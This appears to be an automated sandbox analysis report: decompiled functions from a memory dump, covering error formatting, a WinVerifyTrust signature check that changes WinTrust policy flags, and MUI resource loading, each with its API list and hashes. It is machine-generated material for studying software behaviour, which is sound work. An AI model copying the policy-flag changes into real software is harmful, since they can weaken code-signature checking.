                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: AddressProc$DirectoryErrorLastLibrarySystemmemset$??2@??3@FreeLoadStringwcsrchr
                                                        • String ID: SCRIPT$SaferCloseLevel$SaferComputeTokenFromLevel$SaferIdentifyLevel$SaferRecordEventLogEntry$advapi32.dll$p
                                                        • API String ID: 4129526195-712661522
                                                        • Opcode ID: fa88169bfc34276d25939409aa699c44e6eb93e899385bab0b2bb11d0edb0a78
                                                        • Instruction ID: e8cb2bd1c1a0a97915cd566acdb7d71b94811ae0d7d2e34c8dd912571eea0ad8
                                                        • Opcode Fuzzy Hash: fa88169bfc34276d25939409aa699c44e6eb93e899385bab0b2bb11d0edb0a78
                                                        • Instruction Fuzzy Hash: 3F71D471D0021A9FDB20AFA4CC85AADBAF8FB08304F6045BEE159E7261DB719D84DF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 73%
                                                        			E00B8F3F0(long _a4, long* _a8) {
                                                        				int _v8;
                                                        				char _v12;
                                                        				short _v16;
                                                        				signed int _t27;
                                                        				short* _t33;
                                                        				long _t34;
                                                        				char _t35;
                                                        				short _t38;
                                                        				int _t41;
                                                        				intOrPtr _t47;
                                                        
                                                        				_push(0);
                                                        				_v8 = 0;
                                                        				_v16 = 0;
                                                        				_v12 = 0;
                                                        				_push(0);
                                                        				_t47 =  *0xb97001; // 0x0
                                                        				if(_t47 == 0) {
                                                        					if(FormatMessageA(0x11ff, 0, _a4, 0,  &_v12, ??, ??) != 0) {
                                                        						L16:
                                                        						_t41 = MultiByteToWideChar(0, 0, _v12, 0xffffffff, 0, 0);
                                                        						if(_t41 == 0) {
                                                        							goto L3;
                                                        						} else {
                                                        							_t33 = LocalAlloc(0, _t41 + _t41);
                                                        							_v16 = _t33;
                                                        							if(_t33 == 0) {
                                                        								goto L3;
                                                        							} else {
                                                        								_t34 = MultiByteToWideChar(0, 0, _v12, 0xffffffff, _t33, _t41);
                                                        								if(_t34 != 0) {
                                                        									goto L7;
                                                        								} else {
                                                        									goto L3;
                                                        								}
                                                        							}
                                                        						}
                                                        					} else {
                                                        						_t35 = LocalAlloc(0, 0xb);
                                                        						_v12 = _t35;
                                                        						if(_t35 == 0) {
                                                        							goto L3;
                                                        						} else {
                                                        							E00B8CE81(_t35, 0xb, "0x%8X", _a4);
                                                        							goto L16;
                                                        						}
                                                        					}
                                                        				} else {
                                                        					_t34 = FormatMessageW(0x11ff, 0, _a4, 0,  &_v16, ??, ??);
                                                        					if(_t34 != 0) {
                                                        						L7:
                                                        						__imp__#2(_v16);
                                                        						 *_a8 = _t34;
                                                        					} else {
                                                        						_t38 = LocalAlloc(0, 0x16);
                                                        						_v16 = _t38;
                                                        						if(_t38 != 0) {
                                                        							_t34 = E00B8CF0F(_t38, 0xb, L"0x%8X", _a4);
                                                        							goto L7;
                                                        						} else {
                                                        							L3:
                                                        							_t27 = GetLastError();
                                                        							if(_t27 > 0) {
                                                        								_t27 = _t27 & 0x0000ffff | 0x80070000;
                                                        							}
                                                        							_v8 = _t27;
                                                        						}
                                                        					}
                                                        				}
                                                        				if(_v12 != 0) {
                                                        					LocalFree(_v12);
                                                        				}
                                                        				if(_v16 != 0) {
                                                        					LocalFree(_v16);
                                                        				}
                                                        				return _v8;
                                                        			}

                                                        APIs
                                                        • FormatMessageW.KERNEL32(000011FF,00000000,?,00000000,80070002,00000000,00000000,00B86E16,?,00000000,80070002), ref: 00B8F422
                                                        • LocalAlloc.KERNEL32(00000000,00000016), ref: 00B8F42F
                                                        • GetLastError.KERNEL32 ref: 00B8F43C
                                                        • ___swprintf_l.LIBCMT ref: 00B8F460
                                                        • SysAllocString.OLEAUT32(?), ref: 00B8F46B
                                                        • LocalFree.KERNEL32(?), ref: 00B8F484
                                                        • LocalFree.KERNEL32(?), ref: 00B8F48E
                                                        • FormatMessageA.KERNEL32(000011FF,00000000,?,00000000,?,00000000,00000000,00B86E16,?,00000000,80070002), ref: 00B8F4A8
                                                        • LocalAlloc.KERNEL32(00000000,0000000B), ref: 00B8F4B5
                                                        • ___swprintf_l.LIBCMT ref: 00B8F4D1
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B8F4E8
                                                        • LocalAlloc.KERNEL32(00000000,00000000), ref: 00B8F4F9
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B8F513
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: Local$Alloc$ByteCharFormatFreeMessageMultiWide___swprintf_l$ErrorLastString
                                                        • String ID: 0x%8X$0x%8X
                                                        • API String ID: 3767862258-4147741067
                                                        • Opcode ID: 9b04af228932cefd7928d94535bc651d159ef243d2fb8b653cc13457af97c496
                                                        • Instruction ID: 99f2b0233b5215a8b4af6cbb467aa2c343cdf6ecebd84bc88d7061d84d410480
                                                        • Opcode Fuzzy Hash: 9b04af228932cefd7928d94535bc651d159ef243d2fb8b653cc13457af97c496
                                                        • Instruction Fuzzy Hash: 91311CB690024ABFDB10AFA48C84DBF7BFDEB08354B1485B6F615E2261D6358941DB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 57%
                                                        			E00B91244(wchar_t* __ecx, int _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                                        				signed int _v8;
                                                        				char _v9;
                                                        				char _v10;
                                                        				char _v11;
                                                        				char _v12;
                                                        				char _v13;
                                                        				char _v14;
                                                        				char _v15;
                                                        				char _v16;
                                                        				short _v18;
                                                        				short _v20;
                                                        				char _v24;
                                                        				int _v28;
                                                        				int _v32;
                                                        				signed int _v36;
                                                        				signed int _v40;
                                                        				int _v44;
                                                        				int _v48;
                                                        				wchar_t* _v52;
                                                        				signed int _v56;
                                                        				_Unknown_base(*)()* _v60;
                                                        				intOrPtr _v64;
                                                        				void* _v68;
                                                        				intOrPtr _v72;
                                                        				char _v76;
                                                        				int _v84;
                                                        				int _v88;
                                                        				int _v92;
                                                        				int _v96;
                                                        				char* _v100;
                                                        				intOrPtr _v104;
                                                        				int _v108;
                                                        				intOrPtr _v112;
                                                        				void _v124;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t70;
                                                        				signed int _t76;
                                                        				signed int _t77;
                                                        				_Unknown_base(*)()* _t83;
                                                        				signed int _t84;
                                                        				signed int _t85;
                                                        				signed int _t87;
                                                        				signed int _t103;
                                                        				signed int _t108;
                                                        				signed int _t109;
                                                        				void* _t116;
                                                        				wchar_t* _t117;
                                                        				int _t120;
                                                        				signed int _t121;
                                                        
                                                        				_t70 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t70 ^ _t121;
                                                        				_v48 = _a4;
                                                        				_v20 = 0xcd44;
                                                        				_v18 = 0x11d0;
                                                        				_t117 = __ecx;
                                                        				_v52 = __ecx;
                                                        				_v24 = 0xaac56b;
                                                        				_v16 = 0x8c;
                                                        				_v15 = 0xc2;
                                                        				_v14 = 0;
                                                        				_v13 = 0xc0;
                                                        				_v12 = 0x4f;
                                                        				_v11 = 0xc2;
                                                        				_v10 = 0x95;
                                                        				_v9 = 0xee;
                                                        				_v32 = 0;
                                                        				_v28 = 0;
                                                        				_v36 = 0;
                                                        				_v44 = 0;
                                                        				_t76 = E00B855CA(__ecx, "wintrust.dll",  &_v28);
                                                        				_t118 = _t76;
                                                        				if(_t76 < 0) {
                                                        					L18:
                                                        					_t77 = _v36;
                                                        					if(_t77 != _v44) {
                                                        						_v40(_t77);
                                                        					}
                                                        					if(_v32 != 0) {
                                                        						CloseHandle(_v32);
                                                        					}
                                                        					if(_v28 != 0) {
                                                        						FreeLibrary(_v28);
                                                        					}
                                                        					return E00B81335(_t118, 0, _v8 ^ _t121, _t116, _t117, _t118);
                                                        				}
                                                        				_t83 = GetProcAddress(_v28, "WinVerifyTrust");
                                                        				_v60 = _t83;
                                                        				if(_t83 != 0) {
                                                        					_t84 = GetProcAddress(_v28, "WintrustGetRegPolicyFlags");
                                                        					_v56 = _t84;
                                                        					__eflags = _t84;
                                                        					if(_t84 == 0) {
                                                        						goto L2;
                                                        					}
                                                        					_t87 = GetProcAddress(_v28, "WintrustSetRegPolicyFlags");
                                                        					_v40 = _t87;
                                                        					__eflags = _t87;
                                                        					if(_t87 == 0) {
                                                        						goto L2;
                                                        					}
                                                        					_t118 = E00B90E17(wcsrchr(_t117, 0x2e), _v48, _a8,  &_v32, 0);
                                                        					__eflags = _t118;
                                                        					if(_t118 < 0) {
                                                        						goto L18;
                                                        					}
                                                        					_t120 = 0x30;
                                                        					memset( &_v124, 0, _t120);
                                                        					__eflags = _a16;
                                                        					_t117 =  &_v76;
                                                        					_v124 = _t120;
                                                        					_v108 = 0;
                                                        					_v96 = 0;
                                                        					_v92 = 0;
                                                        					_v88 = 0;
                                                        					_v84 = 0;
                                                        					_v112 = (0 | _a16 == 0x00000000) + 1;
                                                        					_v100 =  &_v76;
                                                        					asm("stosd");
                                                        					asm("stosd");
                                                        					asm("stosd");
                                                        					asm("stosd");
                                                        					_v72 = _v52;
                                                        					_v64 = _a12;
                                                        					_v104 = 1;
                                                        					_v76 = 0x10;
                                                        					_v68 = _v32;
                                                        					__eflags = _a16;
                                                        					if(_a16 != 0) {
                                                        						L12:
                                                        						_t103 = _v60(0,  &_v24,  &_v124);
                                                        						__eflags = _t103;
                                                        						if(__eflags == 0) {
                                                        							L17:
                                                        							_t118 = 0;
                                                        							__eflags = 0;
                                                        							goto L18;
                                                        						}
                                                        						if(__eflags > 0) {
                                                        							__eflags = _t103;
                                                        							if(_t103 > 0) {
                                                        								_t103 = _t103 & 0x0000ffff | 0x80070000;
                                                        								__eflags = _t103;
                                                        							}
                                                        						}
                                                        						_t118 = _t103;
                                                        						__eflags = _t118;
                                                        						if(_t118 < 0) {
                                                        							goto L18;
                                                        						} else {
                                                        							goto L17;
                                                        						}
                                                        					}
                                                        					_v56( &_v36);
                                                        					_t108 = _v36 | 0x00040000;
                                                        					_v44 = _t108;
                                                        					__eflags = _t108 - _v36;
                                                        					if(_t108 == _v36) {
                                                        						goto L12;
                                                        					}
                                                        					_t109 = _v40(_t108);
                                                        					__eflags = _t109;
                                                        					if(_t109 != 0) {
                                                        						goto L12;
                                                        					}
                                                        					_t118 = 0x80004005;
                                                        					goto L18;
                                                        				}
                                                        				L2:
                                                        				_t85 = GetLastError();
                                                        				if(_t85 > 0) {
                                                        					_t85 = _t85 & 0x0000ffff | 0x80070000;
                                                        				}
                                                        				_t118 = _t85;
                                                        				goto L18;
                                                        			}

                                                        APIs
                                                          • Part of subcall function 00B855CA: GetSystemDirectoryA.KERNEL32(?,00000000), ref: 00B855DD
                                                          • Part of subcall function 00B855CA: ??2@YAPAXI@Z.MSVCRT ref: 00B85603
                                                          • Part of subcall function 00B855CA: GetSystemDirectoryA.KERNEL32(00000000,00000001), ref: 00B85616
                                                          • Part of subcall function 00B855CA: LoadLibraryA.KERNEL32(00000000), ref: 00B85645
                                                          • Part of subcall function 00B855CA: ??3@YAXPAX@Z.MSVCRT ref: 00B8565F
                                                        • GetProcAddress.KERNEL32(00B905FC,WinVerifyTrust,wintrust.dll,00B905FC,?,?,00000000), ref: 00B912D0
                                                        • GetLastError.KERNEL32(?,00000000), ref: 00B912D9
                                                        • GetProcAddress.KERNEL32(00B905FC,WintrustGetRegPolicyFlags,?,00000000), ref: 00B912FC
                                                        • GetProcAddress.KERNEL32(00B905FC,WintrustSetRegPolicyFlags,?,00000000), ref: 00B9130D
                                                        • wcsrchr.MSVCRT ref: 00B91324
                                                        • memset.MSVCRT ref: 00B91344
                                                        • CloseHandle.KERNEL32(?), ref: 00B91400
                                                        • FreeLibrary.KERNEL32(00B905FC,wintrust.dll,00B905FC,?,?,00000000), ref: 00B9140E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: AddressProc$DirectoryLibrarySystem$??2@??3@CloseErrorFreeHandleLastLoadmemsetwcsrchr
                                                        • String ID: O$WinVerifyTrust$WintrustGetRegPolicyFlags$WintrustSetRegPolicyFlags$wintrust.dll
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 91%
                                                        			E00B947EF(WCHAR* __edx, void* __edi, WCHAR* _a4, signed int _a8, signed short _a12) {
                                                        				signed int _v8;
                                                        				char _v180;
                                                        				char _v352;
                                                        				char _v524;
                                                        				short _v1044;
                                                        				struct HINSTANCE__* _v1048;
                                                        				WCHAR* _v1052;
                                                        				signed int _v1056;
                                                        				signed int _v1060;
                                                        				WCHAR* _v1064;
                                                        				WCHAR* _v1068;
                                                        				void* __ebx;
                                                        				void* __esi;
                                                        				signed int _t173;
                                                        				signed int _t175;
                                                        				signed char _t177;
                                                        				signed int _t183;
                                                        				signed int _t185;
                                                        				signed int _t186;
                                                        				signed char _t188;
                                                        				signed int _t191;
                                                        				struct HINSTANCE__* _t193;
                                                        				signed int _t197;
                                                        				signed int _t205;
                                                        				signed short _t206;
                                                        				signed short _t207;
                                                        				signed int _t215;
                                                        				signed short _t223;
                                                        				signed int _t229;
                                                        				signed int _t233;
                                                        				void* _t234;
                                                        				signed int _t238;
                                                        				signed int _t240;
                                                        				signed int _t247;
                                                        				signed int _t250;
                                                        				signed int _t254;
                                                        				signed int _t257;
                                                        				signed int _t261;
                                                        				signed int _t273;
                                                        				signed short _t276;
                                                        				signed short _t284;
                                                        				signed int _t293;
                                                        				void* _t306;
                                                        				signed short _t324;
                                                        				WCHAR* _t327;
                                                        				WCHAR* _t330;
                                                        				WCHAR* _t331;
                                                        				signed int _t334;
                                                        				void* _t335;
                                                        
                                                        				_t323 = __edi;
                                                        				_t322 = __edx;
                                                        				_t173 =  *0xb97004; // 0xbb40e64e
                                                        				_v8 = _t173 ^ _t334;
                                                        				_t333 = _a4;
                                                        				_t293 = 0;
                                                        				_v1068 = _t333;
                                                        				_v1052 = 0;
                                                        				if(_t333 != 0) {
                                                        					__eflags = _a8 & 0xffffffe3;
                                                        					if((_a8 & 0xffffffe3) != 0) {
                                                        						goto L1;
                                                        					} else {
                                                        						_push(__edi);
                                                        						_t324 = _a12;
                                                        						__eflags = _t324;
                                                        						if(_t324 != 0) {
                                                        							L5:
                                                        							_t177 = E00B9407D();
                                                        							 *0xb974d0 = _t177;
                                                        							_t175 = LoadLibraryExW(_t333, 0, _t177 & 0x20 | 0x00000002);
                                                        							_v1048 = _t175;
                                                        							__eflags = _t175;
                                                        							if(_t175 == 0) {
                                                        								goto L72;
                                                        							} else {
                                                        								__eflags =  *0xb974d0 & 0x00000020;
                                                        								if(( *0xb974d0 & 0x00000020) == 0) {
                                                        									_t183 = SearchPathW(0, _t333, 0, 0x104,  &_v1044,  &_v1052);
                                                        									__eflags = _t183;
                                                        									if(_t183 == 0) {
                                                        										L71:
                                                        										FreeLibrary(_v1048);
                                                        										goto L72;
                                                        									} else {
                                                        										_t185 = _v1052;
                                                        										__eflags = _t185;
                                                        										if(_t185 != 0) {
                                                        											_v1056 =  &_v1044;
                                                        											__eflags = 0;
                                                        											 *((short*)(_t185 - 2)) = 0;
                                                        										} else {
                                                        											_v1056 = _v1056 & _t293;
                                                        											_v1052 =  &_v1044;
                                                        										}
                                                        										_t186 = E00B93F3E(_v1048, 0);
                                                        										__eflags = _t186;
                                                        										if(_t186 == 0) {
                                                        											L69:
                                                        											__eflags = _a8 & 0x00000010;
                                                        											if((_a8 & 0x00000010) == 0) {
                                                        												L77:
                                                        												__eflags = _v1048 & 0x00000001;
                                                        												if((_v1048 & 0x00000001) != 0) {
                                                        													FreeLibrary(_v1048);
                                                        													_t188 = E00B9407D();
                                                        													__eflags = _t188 & 0x00000038;
                                                        													if((_t188 & 0x00000038) == 0) {
                                                        														E00B9407D();
                                                        														_t191 = 0;
                                                        														_t168 = __eflags != 0;
                                                        														__eflags = _t168;
                                                        														_t193 = LoadLibraryExW(_v1068, 0, _t191 & 0xffffff00 | _t168);
                                                        													} else {
                                                        														_push(_v1052);
                                                        														E00B94653( &_v1044, 0x104, L"%s\\%s", _v1056);
                                                        														_t193 = E00B93FF0( &_v1044, 1, 0);
                                                        													}
                                                        													_v1048 = _t193;
                                                        												}
                                                        												_t175 = _v1048;
                                                        											} else {
                                                        												_t197 = E00B93F3E(_v1048, _a12);
                                                        												__eflags = _t197;
                                                        												if(_t197 != 0) {
                                                        													goto L77;
                                                        												} else {
                                                        													goto L71;
                                                        												}
                                                        											}
                                                        										} else {
                                                        											__eflags = _t324;
                                                        											if(_t324 != 0) {
                                                        												__eflags =  *0xb974d0 & 0x00000007;
                                                        												if(( *0xb974d0 & 0x00000007) == 0) {
                                                        													goto L69;
                                                        												} else {
                                                        													__eflags = _a8 & 0x00000008;
                                                        													if((_a8 & 0x00000008) == 0) {
                                                        														E00B94653( &_v180, 0x55, L"MUI\\%04hx", _t324 & 0x0000ffff);
                                                        														_t335 = _t335 + 0x10;
                                                        														goto L74;
                                                        													} else {
                                                        														_t333 =  &_v180;
                                                        														_t205 = E00B945B5(0,  &_v180, _t324,  &_v352);
                                                        														__eflags = _t205;
                                                        														if(_t205 != 0) {
                                                        															L74:
                                                        															_t322 =  &_v180;
                                                        															_t293 = E00B9472C(_v1052, _v1048,  &_v180, _v1056);
                                                        															goto L75;
                                                        														} else {
                                                        															goto L69;
                                                        														}
                                                        													}
                                                        												}
                                                        											} else {
                                                        												_t206 =  *0xb974d0; // 0x0
                                                        												__eflags = _t206 & 0x00000004;
                                                        												if((_t206 & 0x00000004) == 0) {
                                                        													__eflags = _t206 & 0x00000003;
                                                        													if((_t206 & 0x00000003) == 0) {
                                                        														goto L69;
                                                        													} else {
                                                        														_t207 = E00B9422B();
                                                        														__eflags = _a8 & 0x00000008;
                                                        														_t208 = _t207 & 0x0000ffff;
                                                        														_v1064 = _t207 & 0x0000ffff;
                                                        														if((_a8 & 0x00000008) == 0) {
                                                        															E00B94653( &_v180, 0x55, L"MUI\\%04hx", _t208 & 0x0000ffff);
                                                        															_t335 = _t335 + 0x10;
                                                        															_t322 =  &_v180;
                                                        															_t293 = E00B9472C(_v1052, _v1048,  &_v180, _v1056);
                                                        															__eflags = _t293;
                                                        															if(_t293 != 0) {
                                                        																goto L76;
                                                        															} else {
                                                        																_t333 =  &_v180;
                                                        																_t215 = E00B945B5(0, _t333, _v1064,  &_v352);
                                                        																__eflags = _t215;
                                                        																if(_t215 == 0) {
                                                        																	L60:
                                                        																	__eflags = 0x409 - _v1064;
                                                        																	goto L61;
                                                        																} else {
                                                        																	_t223 = E00B9502B( &_v352, 2) & 0x0000ffff;
                                                        																	__eflags = _t223;
                                                        																	if(_t223 == 0) {
                                                        																		goto L60;
                                                        																	} else {
                                                        																		E00B94653(_t333, 0x55, L"MUI\\%04hx", _t223 & 0x0000ffff);
                                                        																		_t335 = _t335 + 0x10;
                                                        																		_t322 = _t333;
                                                        																		_t293 = E00B9472C(_v1052, _v1048, _t333, _v1056);
                                                        																		__eflags = _t293;
                                                        																		if(_t293 != 0) {
                                                        																			goto L76;
                                                        																		} else {
                                                        																			goto L60;
                                                        																		}
                                                        																	}
                                                        																}
                                                        															}
                                                        														} else {
                                                        															_t327 =  &_v524;
                                                        															_t333 =  &_v180;
                                                        															_t229 = E00B945B5(_t327, _t333, _t208,  &_v352);
                                                        															__eflags = _t229;
                                                        															if(_t229 == 0) {
                                                        																goto L69;
                                                        															} else {
                                                        																_t322 = _t333;
                                                        																_t293 = E00B9472C(_v1052, _v1048, _t333, _v1056);
                                                        																__eflags = _t293;
                                                        																if(_t293 != 0) {
                                                        																	goto L76;
                                                        																} else {
                                                        																	_t322 =  &_v352;
                                                        																	_t233 = E00B9472C(_v1052, _v1048,  &_v352, _v1056);
                                                        																	_t293 = _t233;
                                                        																	__eflags = _t293;
                                                        																	if(_t293 != 0) {
                                                        																		goto L76;
                                                        																	} else {
                                                        																		__eflags = _v524 - _t233;
                                                        																		if(_v524 == _t233) {
                                                        																			L53:
                                                        																			_t234 = 0x409;
                                                        																			_t306 = 0x409;
                                                        																			goto L54;
                                                        																		} else {
                                                        																			_t322 = _t327;
                                                        																			_t293 = E00B9472C(_v1052, _v1048, _t327, _v1056);
                                                        																			__eflags = _t293;
                                                        																			if(_t293 != 0) {
                                                        																				goto L76;
                                                        																			} else {
                                                        																				goto L53;
                                                        																			}
                                                        																		}
                                                        																	}
                                                        																}
                                                        															}
                                                        														}
                                                        													}
                                                        												} else {
                                                        													__imp__GetUserDefaultUILanguage();
                                                        													_t238 = _t206 & 0x0000ffff;
                                                        													_v1060 = _t238;
                                                        													__eflags = _t238 - 0x404;
                                                        													if(_t238 == 0x404) {
                                                        														_v1060 = E00B941BC() & 0x0000ffff;
                                                        													}
                                                        													_t240 = _a8 & 0x00000008;
                                                        													__eflags = _t240;
                                                        													_v1064 = _t240;
                                                        													while(1) {
                                                        														__eflags = _v1064;
                                                        														if(_v1064 == 0) {
                                                        															goto L25;
                                                        														}
                                                        														_t330 =  &_v524;
                                                        														_t333 =  &_v180;
                                                        														_t250 = E00B945B5(_t330, _t333, _v1060,  &_v352);
                                                        														__eflags = _t250;
                                                        														if(_t250 == 0) {
                                                        															L75:
                                                        															__eflags = _t293;
                                                        															if(_t293 == 0) {
                                                        																goto L69;
                                                        															} else {
                                                        																goto L76;
                                                        															}
                                                        														} else {
                                                        															_t322 = _t333;
                                                        															_t293 = E00B9472C(_v1052, _v1048, _t333, _v1056);
                                                        															__eflags = _t293;
                                                        															if(_t293 != 0) {
                                                        																L76:
                                                        																FreeLibrary(_v1048);
                                                        																_t175 = _t293;
                                                        															} else {
                                                        																_t322 =  &_v352;
                                                        																_t254 = E00B9472C(_v1052, _v1048,  &_v352, _v1056);
                                                        																_t293 = _t254;
                                                        																__eflags = _t293;
                                                        																if(_t293 != 0) {
                                                        																	goto L76;
                                                        																} else {
                                                        																	__eflags = _v524 - _t254;
                                                        																	if(_v524 == _t254) {
                                                        																		L23:
                                                        																		__eflags = _v1060 - 0xc04;
                                                        																		if(_v1060 != 0xc04) {
                                                        																			__imp__GetSystemDefaultUILanguage();
                                                        																			_v1064 = 0xc04;
                                                        																			__eflags = 0xc04 - _v1060;
                                                        																			if(0xc04 == _v1060) {
                                                        																				L44:
                                                        																				_t234 = 0x409;
                                                        																				_t306 = 0x409;
                                                        																				__eflags = 0x409 - _v1060;
                                                        																				if(0x409 != _v1060) {
                                                        																					L54:
                                                        																					__eflags = _t306 - _v1064;
                                                        																					if(_t306 == _v1064) {
                                                        																						goto L64;
                                                        																					} else {
                                                        																						_t333 =  &_v180;
                                                        																						E00B945B5(0, _t333, _t234,  &_v352);
                                                        																						_t322 = _t333;
                                                        																						L63:
                                                        																						_t293 = E00B9472C(_v1052, _v1048, _t322, _v1056);
                                                        																						__eflags = _t293;
                                                        																						if(_t293 != 0) {
                                                        																							goto L76;
                                                        																						} else {
                                                        																							goto L64;
                                                        																						}
                                                        																					}
                                                        																				} else {
                                                        																					L64:
                                                        																					_t322 = 0;
                                                        																					_t293 = E00B9472C(_v1052, _v1048, 0, _v1056);
                                                        																					__eflags = _t293;
                                                        																					if(_t293 == 0) {
                                                        																						goto L75;
                                                        																					} else {
                                                        																						goto L76;
                                                        																					}
                                                        																				}
                                                        																			} else {
                                                        																				_t331 =  &_v524;
                                                        																				_t333 =  &_v180;
                                                        																				_t257 = E00B945B5(_t331, _t333, 0xc04,  &_v352);
                                                        																				__eflags = _t257;
                                                        																				if(_t257 == 0) {
                                                        																					goto L69;
                                                        																				} else {
                                                        																					_t322 = _t333;
                                                        																					_t293 = E00B9472C(_v1052, _v1048, _t333, _v1056);
                                                        																					__eflags = _t293;
                                                        																					if(_t293 != 0) {
                                                        																						goto L76;
                                                        																					} else {
                                                        																						_t322 =  &_v352;
                                                        																						_t261 = E00B9472C(_v1052, _v1048,  &_v352, _v1056);
                                                        																						_t293 = _t261;
                                                        																						__eflags = _t293;
                                                        																						if(_t293 != 0) {
                                                        																							goto L76;
                                                        																						} else {
                                                        																							__eflags = _v524 - _t261;
                                                        																							if(_v524 == _t261) {
                                                        																								goto L44;
                                                        																							} else {
                                                        																								_t322 = _t331;
                                                        																								_t293 = E00B9472C(_v1052, _v1048, _t331, _v1056);
                                                        																								__eflags = _t293;
                                                        																								if(_t293 != 0) {
                                                        																									goto L76;
                                                        																								} else {
                                                        																									goto L44;
                                                        																								}
                                                        																							}
                                                        																						}
                                                        																					}
                                                        																				}
                                                        																			}
                                                        																		} else {
                                                        																			L24:
                                                        																			_v1060 = 0x404;
                                                        																			continue;
                                                        																		}
                                                        																	} else {
                                                        																		_t322 = _t330;
                                                        																		_t293 = E00B9472C(_v1052, _v1048, _t330, _v1056);
                                                        																		__eflags = _t293;
                                                        																		if(_t293 != 0) {
                                                        																			goto L76;
                                                        																		} else {
                                                        																			goto L23;
                                                        																		}
                                                        																	}
                                                        																}
                                                        															}
                                                        														}
                                                        														goto L83;
                                                        														L25:
                                                        														E00B94653( &_v180, 0x55, L"MUI\\%04hx", _v1060 & 0x0000ffff);
                                                        														_t335 = _t335 + 0x10;
                                                        														_t322 =  &_v180;
                                                        														_t293 = E00B9472C(_v1052, _v1048,  &_v180, _v1056);
                                                        														__eflags = _t293;
                                                        														if(_t293 != 0) {
                                                        															goto L76;
                                                        														} else {
                                                        															_t333 =  &_v180;
                                                        															_t247 = E00B945B5(0, _t333, _v1060,  &_v352);
                                                        															__eflags = _t247;
                                                        															if(_t247 == 0) {
                                                        																L29:
                                                        																__eflags = _v1060 - 0xc04;
                                                        																if(_v1060 == 0xc04) {
                                                        																	goto L24;
                                                        																} else {
                                                        																	__imp__GetSystemDefaultUILanguage();
                                                        																	_t333 = 0xc04;
                                                        																	_v1064 = 0xc04;
                                                        																	__eflags = 0xc04 - _v1060;
                                                        																	if(0xc04 == _v1060) {
                                                        																		L36:
                                                        																		__eflags = 0x409 - _v1060;
                                                        																		if(0x409 == _v1060) {
                                                        																			goto L64;
                                                        																		} else {
                                                        																			__eflags = 0x409 - _t333;
                                                        																			L61:
                                                        																			if(__eflags == 0) {
                                                        																				goto L64;
                                                        																			} else {
                                                        																				_t322 = L"MUI\\0409";
                                                        																				goto L63;
                                                        																			}
                                                        																		}
                                                        																	} else {
                                                        																		E00B94653( &_v180, 0x55, L"MUI\\%04hx", 0xc04);
                                                        																		_t335 = _t335 + 0x10;
                                                        																		_t322 =  &_v180;
                                                        																		_t293 = E00B9472C(_v1052, _v1048,  &_v180, _v1056);
                                                        																		__eflags = _t293;
                                                        																		if(_t293 != 0) {
                                                        																			goto L76;
                                                        																		} else {
                                                        																			_t333 =  &_v180;
                                                        																			_t273 = E00B945B5(0, _t333, 0xc04,  &_v352);
                                                        																			__eflags = _t273;
                                                        																			if(_t273 == 0) {
                                                        																				L35:
                                                        																				_t333 = _v1064;
                                                        																				goto L36;
                                                        																			} else {
                                                        																				_t276 = E00B9502B( &_v352, 2) & 0x0000ffff;
                                                        																				__eflags = _t276;
                                                        																				if(_t276 == 0) {
                                                        																					goto L35;
                                                        																				} else {
                                                        																					E00B94653(_t333, 0x55, L"MUI\\%04hx", _t276 & 0x0000ffff);
                                                        																					_t335 = _t335 + 0x10;
                                                        																					_t322 = _t333;
                                                        																					_t293 = E00B9472C(_v1052, _v1048, _t333, _v1056);
                                                        																					__eflags = _t293;
                                                        																					if(_t293 != 0) {
                                                        																						goto L76;
                                                        																					} else {
                                                        																						goto L35;
                                                        																					}
                                                        																				}
                                                        																			}
                                                        																		}
                                                        																	}
                                                        																}
                                                        															} else {
                                                        																_t284 = E00B9502B( &_v352, 2) & 0x0000ffff;
                                                        																__eflags = _t284;
                                                        																if(_t284 == 0) {
                                                        																	goto L29;
                                                        																} else {
                                                        																	E00B94653(_t333, 0x55, L"MUI\\%04hx", _t284 & 0x0000ffff);
                                                        																	_t335 = _t335 + 0x10;
                                                        																	_t322 = _t333;
                                                        																	_t293 = E00B9472C(_v1052, _v1048, _t333, _v1056);
                                                        																	__eflags = _t293;
                                                        																	if(_t293 != 0) {
                                                        																		goto L76;
                                                        																	} else {
                                                        																		goto L29;
                                                        																	}
                                                        																}
                                                        															}
                                                        														}
                                                        														goto L83;
                                                        													}
                                                        												}
                                                        											}
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        						} else {
                                                        							__eflags = _a8 & 0x00000010;
                                                        							if((_a8 & 0x00000010) != 0) {
                                                        								L72:
                                                        								_t175 = 0;
                                                        							} else {
                                                        								goto L5;
                                                        							}
                                                        						}
                                                        						L83:
                                                        						_pop(_t323);
                                                        					}
                                                        				} else {
                                                        					L1:
                                                        					_t175 = 0;
                                                        				}
                                                        				return E00B81335(_t175, _t293, _v8 ^ _t334, _t322, _t323, _t333);
                                                        			}


                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(00000008,00000000,?,00000000,00000000,00000000), ref: 00B94855
                                                        • SearchPathW.KERNEL32 ref: 00B9488E
                                                        • GetUserDefaultUILanguage.KERNEL32(?,00000000), ref: 00B948F7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: DefaultLanguageLibraryLoadPathSearchUser
                                                        • String ID: %s\%s$MUI\%04hx$MUI\0409
                                                        • API String ID: 3447616162-4119042291
